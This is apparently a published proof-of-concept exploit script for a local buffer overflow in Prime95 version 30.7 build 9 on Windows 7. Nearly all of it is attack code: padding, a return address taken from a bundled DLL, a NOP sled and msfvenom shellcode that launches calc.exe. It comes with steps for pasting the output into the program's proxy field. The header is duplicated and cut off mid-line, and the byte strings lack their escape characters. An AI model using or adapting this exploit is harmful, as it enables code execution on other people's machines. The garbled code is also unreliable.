# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Soft # Exploit Title: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86
# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# 1- How to use: open the program go to test-PrimeNet-check the square-Connections
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open
buffer = "A" * 144
jum = "xd8x29xe7x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:exlibhwloc-15.dll)
nop = "x90" * 20 #Nob
hot = "C" * 100
#sudo msfvenom -p windows/exec CMD=calc.exe -b "x00x09x0Ax0d" -f python -v payload
payload = b""
payload += b"xbbx72xd7x5dx16xdbxc0xd9x74x24xf4x5d"
payload += b"x29xc9xb1x31x83xc5x04x31x5dx0fx03x5d"
payload += b"x7dx35xa8xeax69x3bx53x13x69x5cxddxf6"
payload += b"x58x5cxb9x73xcax6cxc9xd6xe6x07x9fxc2"
payload += b"x7dx65x08xe4x36xc0x6excbxc7x79x52x4a"
payload += b"x4bx80x87xacx72x4bxdaxadxb3xb6x17xff"
payload += b"x6cxbcx8ax10x19x88x16x9ax51x1cx1fx7f"
payload += b"x21x1fx0ex2ex3ax46x90xd0xefxf2x99xca"
payload += b"xecx3fx53x60xc6xb4x62xa0x17x34xc8x8d"
payload += b"x98xc7x10xc9x1ex38x67x23x5dxc5x70xf0"
payload += b"x1cx11xf4xe3x86xd2xaexcfx37x36x28x9b"
payload += b"x3bxf3x3exc3x5fx02x92x7fx5bx8fx15x50"
payload += b"xeaxcbx31x74xb7x88x58x2dx1dx7ex64x2d"
payload += b"xfexdfxc0x25x12x0bx79x64x78xcax0fx12"
payload += b"xcexccx0fx1dx7exa5x3ex96x11xb2xbex7d"
payload += b"x56x4cxf5xdcxfexc5x50xb5x43x88x62x63"
payload += b"x87xb5xe0x86x77x42xf8xe2x72x0exbex1f"
payload += b"x0ex1fx2bx20xbdx20x7ex43x20xb3xe2xaa"
payload += b"xc7x33x80xb2"
evil = buffer + jum + nop + payload
file = open('PExploit.txt','w+')
file.write(evil)
file.close()